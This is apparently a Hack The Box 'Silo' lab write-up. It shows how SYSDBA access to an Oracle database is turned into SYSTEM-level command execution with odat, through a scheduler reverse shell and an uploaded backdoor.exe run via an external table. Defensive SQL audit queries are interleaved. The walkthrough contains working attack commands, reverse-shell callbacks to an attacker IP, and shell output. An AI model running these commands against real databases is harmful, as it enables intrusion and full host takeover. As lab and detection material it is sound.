System


Having a SYSDBA credential to an Oracle Database gives a unique opportunity to do many things.

Among them, lies system command execution.

There are two approaches.

Direct Reverse Shell


I can get a reverse shell spawned via one of the modules available in odat.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat dbmsscheduler --help
[...]
--reverse-shell ip port          get a reverse shell. Use Python on Linux targets.
                                   On Windows, uses Powershell (download a script file and executes it remotely)

The dbmsscheduler module in odat has a --reverse-shell flag with a built-in script that hosts the reverse-shell payload on a temporary local HTTP server and has the target download and execute it.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat dbmsscheduler -s $IP -U scott -P tiger -d XE --sysdba --reverse-shell 10.10.14.5 9999
 
[1] (10.10.10.82:1521): Try to give you a reverse shell from the 10.10.10.82 server
Give me the local port for the temporary http file server {e.g. 8080): 8080
10.10.10.82 - - [17/Jan/2023 20:45:12] "GET /URCLXGGFUI HTTP/1.1" 200 -
[+] The Job is finish
nc: invalid option -- '4'
nc -h for help
[+] The Job is running
[+] The Job is finish

Executing the dbmsscheduler module with the --reverse-shell flag. Notice the --sysdba flag: it must be supplied in order to get system-level command execution.
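From the defender's side, the step above leaves traces in the Oracle data dictionary. The following audit queries are added here and are not part of the original writeup or of odat; they assume a DBA-privileged session on the instance under review and use only standard Oracle dictionary views (v$pwfile_users, v$parameter, dba_scheduler_jobs, dba_scheduler_job_log, dba_scheduler_job_run_details). No object names from the target are assumed.

```sql
-- Added audit queries, not part of the original writeup. They assume a
-- DBA-privileged session on the instance being reviewed and use only
-- standard Oracle data-dictionary views.

-- 1. Which accounts can connect AS SYSDBA at all? The technique above only
--    works because a default account (scott/tiger) is paired with --sysdba.
--    Every row here should be a known administrative account.
SELECT username, sysdba, sysoper
  FROM v$pwfile_users
 ORDER BY username;

-- 2. Is SYSDBA activity recorded? The normal audit trail does not record
--    actions performed AS SYSDBA unless AUDIT_SYS_OPERATIONS is TRUE, so a
--    scheduler job created in a SYSDBA session is invisible to it.
SELECT name, value
  FROM v$parameter
 WHERE name IN ('audit_trail', 'audit_sys_operations');

-- 3. Scheduler jobs of type EXECUTABLE run an OS program as the database
--    service account (nt authority\system on the box above). Review every
--    such job and its program path; ad-hoc jobs that point at an
--    interpreter or a freshly downloaded file are the ones to chase.
SELECT owner, job_name, job_action, enabled, state, last_start_date
  FROM dba_scheduler_jobs
 WHERE job_type = 'EXECUTABLE'
 ORDER BY last_start_date DESC NULLS LAST;

-- 4. Jobs created with auto_drop vanish from DBA_SCHEDULER_JOBS once they
--    finish, but the job log keeps CREATE/RUN/DROP rows together with the
--    database user who performed each operation. A job created and dropped
--    within minutes by a non-administrative account is the pattern to flag.
SELECT log_date, owner, job_name, operation, status, user_name, additional_info
  FROM dba_scheduler_job_log
 WHERE log_date > SYSTIMESTAMP - INTERVAL '7' DAY
 ORDER BY log_date DESC;

-- 5. Run details keep the exit status and any error text in ADDITIONAL_INFO,
--    so failed attempts are visible even after the job itself is gone.
SELECT actual_start_date, owner, job_name, status, error#, additional_info
  FROM dba_scheduler_job_run_details
 WHERE actual_start_date > SYSTIMESTAMP - INTERVAL '7' DAY
   AND status <> 'SUCCEEDED'
 ORDER BY actual_start_date DESC;

-- 6. Traditional auditing option that records every call into the scheduler
--    package (requires AUDIT_TRAIL = DB or DB,EXTENDED; SYSDBA sessions are
--    only covered when AUDIT_SYS_OPERATIONS is TRUE).
AUDIT EXECUTE ON sys.dbms_scheduler BY ACCESS;
```

Queries 3 to 5 are worth scheduling as a recurring check; query 1 is the one-time finding that matters most, since locking or re-passwording the default account and withdrawing SYSDBA from anything that is not an administrator removes the precondition for everything that follows on this page.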

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49168
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> whoami
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> mkdir C:\tmp
 
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> cd ..
 
C:\oraclexe\app\oracle\product\11.2.0\server> cd C:\tmp
 
C:\tmp> cd C:\Users\Administrator
 
C:\Users\Administrator> dir
  Volume in drive C has no label.
 Volume Serial Number is 69B2-6341
 
 Directory of C:\Users\Administrator
 
01/01/2018  12:49 AM    <DIR>          .
01/01/2018  12:49 AM    <DIR>          ..
01/06/2018  09:13 PM    <DIR>          Contacts
01/07/2018  01:34 PM    <DIR>          Desktop
01/06/2018  09:13 PM    <DIR>          Documents
01/07/2018  09:35 PM    <DIR>          Downloads
01/06/2018  09:13 PM    <DIR>          Favorites
01/06/2018  09:13 PM    <DIR>          Links
01/06/2018  09:13 PM    <DIR>          Music
01/01/2018  12:11 AM    <DIR>          Oracle
01/06/2018  09:13 PM    <DIR>          Pictures
01/06/2018  09:13 PM    <DIR>          Saved Games
01/06/2018  09:13 PM    <DIR>          Searches
01/06/2018  09:13 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,403,036,672 bytes free
 
 

The shell is a bit funky, as I can only use really basic commands, but I am indeed nt authority\system, as I can access the home directory of Administrator.

System Level Compromise

Shell Upload


Since the --reverse-shell flag is a bit unreliable, I will supply my own reverse shell.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat utlfile -s $ip -u scott -p tiger -d xe --sysdba --putfile 'c:\' backdoor.exe /home/kali/archive/htb/labs/silo/backdoor.exe
 
[1] (10.10.10.82:1521): Put the /home/kali/archive/htb/labs/silo/backdoor.exe local file in the C:\ folder like backdoor.exe on the 10.10.10.82 server
[+] the /home/kali/archive/htb/labs/silo/backdoor.exe file was created on the c:\ directory on the 10.10.10.82 server like the backdoor.exe file

I can use odat's utlfile module to upload the reverse shell remotely.

  • Notice the quotes around the path 'c:\' so as not to confuse Windows.
  • An absolute path is required to point to the local file.
  • The --sysdba flag needs to be supplied, just like before.

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ odat externaltable -s $ip -u scott -p tiger -d xe --sysdba --exec 'c:\' backdoor.exe
 
[1] (10.10.10.82:1521): Execute the backdoor.exe command stored in the C:path
[+] the backdoor.exe command stored in c:has been executed (normally)

I can then use odat's externaltable module to execute the uploaded file. The --sysdba flag needs to be supplied here as well.
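The two primitives used above, writing a file through UTL_FILE and executing it through an external table, are both governed by dictionary objects a DBA can review. The following audit queries are added here and are not part of the original writeup or of odat; they assume a DBA-privileged session and use only standard dictionary views (v$parameter, dba_directories, dba_tab_privs, dba_external_tables).

```sql
-- Added audit queries, not part of the original writeup. They assume a
-- DBA-privileged session and use only standard data-dictionary views.

-- 1. Legacy file-system access (releases up to 12c, including the 11.2 XE
--    seen above): a UTL_FILE_DIR of '*' lets UTL_FILE read and write any
--    path the service account can reach.
SELECT name, value
  FROM v$parameter
 WHERE name = 'utl_file_dir';

-- 2. Directory objects and who holds READ/WRITE/EXECUTE on them. A
--    directory mapped to a drive root, or granted to PUBLIC, turns UTL_FILE
--    into a file-upload primitive for every user who can reach it.
SELECT d.directory_name, d.directory_path,
       LISTAGG(p.grantee || ':' || p.privilege, ', ')
         WITHIN GROUP (ORDER BY p.grantee, p.privilege) AS grants
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.owner = d.owner
   AND p.table_name = d.directory_name
 GROUP BY d.directory_name, d.directory_path
 ORDER BY d.directory_name;

-- 3. External tables whose access parameters name a PREPROCESSOR. Oracle
--    runs that program as the database service account whenever the table
--    is queried; this is the feature external-table command execution
--    relies on, so every hit here needs an owner who can explain it.
SELECT owner, table_name, default_directory_name, access_parameters
  FROM dba_external_tables
 WHERE UPPER(access_parameters) LIKE '%PREPROCESSOR%';

-- 4. Traditional auditing options that make both primitives visible
--    (require AUDIT_TRAIL = DB or DB,EXTENDED; sessions connected AS SYSDBA
--    are only covered when AUDIT_SYS_OPERATIONS is TRUE).
AUDIT DIRECTORY;
AUDIT EXECUTE ON sys.utl_file BY ACCESS;
```

The OS-level half of the problem is visible in the shells above: the prompt reports nt authority\system and the PowerShell banner shows the machine account SILO$, which means the Oracle service is running as LocalSystem, so anything the database can execute runs with full control of the host. Running the service under a dedicated low-privilege Windows account is a service-configuration change rather than a SQL one and is outside what these queries check.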

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49175
Windows PowerShell running as user SILO$ on SILO
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> whoami
nt authority\system
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> hostname
SILO
ps c:\oraclexe\app\oracle\product\11.2.0\server\DATABASE> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.82
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{50cd6e47-e5c7-44a8-b294-ba01e18b9e30}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

Connection received

System Level Compromise